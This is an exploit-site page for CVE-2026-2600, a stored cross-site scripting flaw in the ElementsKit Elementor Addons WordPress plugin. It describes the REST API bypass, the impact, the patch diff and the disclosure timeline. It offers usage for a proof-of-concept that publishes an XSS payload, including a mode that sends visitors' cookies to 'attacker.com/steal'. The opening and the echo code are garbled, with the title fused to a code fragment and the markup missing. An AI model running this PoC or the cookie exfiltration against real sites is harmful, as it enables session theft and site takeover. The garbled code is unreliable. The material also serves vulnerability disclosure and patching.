## https://sploitus.com/exploit?id=DD99D3D7-A2B3-50BE-AB9E-D45FFF4E8621
# CVE-2026-2600
**ElementsKit Elementor Addons $item ) {
echo '' . $item['ekit_tab_title'] . '';
}
```
Elementor's editor sanitizes input on the client side, but the REST API endpoint (`/wp-json/wp/v2/posts/{id}`) accepts the `_elementor_data` meta field directly and bypasses that layer entirely.
An authenticated Contributor can PATCH a post with a crafted Elementor JSON payload that sets `ekit_tab_title` to arbitrary HTML. Because the value is stored verbatim in `_elementor_data` and echoed without `esc_html()` at render time, the script executes in every visitor's browser when the page loads.
## Impact
Any Contributor can:
- Steal session cookies and authentication tokens from all site visitors, including administrators
- Hijack admin accounts and escalate to full site takeover
- Deploy keyloggers or credential-harvesting overlays silently
- Redirect visitors to phishing pages or malware distribution sites
- Deface pages persistently โ payload survives until manually removed
400K+ active installs were affected at disclosure time.
## Usage
```bash
pip install requests
python3 poc.py https://target.com contributor p4ss
```
The script authenticates over HTTP, fetches the REST nonce from the admin editor, creates a draft post, patches `_elementor_data` with the XSS payload embedded in the `ekit_tab_title` field, and publishes the post. Output confirms whether the payload is live in the page source.
```bash
# Custom payload
python3 poc.py https://target.com contributor p4ss --payload 'alert(document.domain)'
# Cookie exfiltration with callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# Interactive console mode
python3 console_poc.py
```
## Demo
## Full writeup
https://folks-iwd.github.io/writeups/cve-2026-2600.html
## Disclosure timeline
| Date | Event |
|------|-------|
| January 2026 | Discovered via SVN diff review. PoC confirmed. |
| January 2026 | Reported to Patchstack Alliance with full writeup and PoC. |
| March 2026 | Wpmet shipped the fix in v3.8.0. |
| April 2026 | CVE-2026-2600 published. CVSS 6.4 MEDIUM assigned. |
## The patch
Wpmet added `esc_html()` around the tab title output in `widgets/tab/tab.php`:
```php
- echo '' . $item['ekit_tab_title'] . '';
+ echo '' . esc_html( $item['ekit_tab_title'] ) . '';
```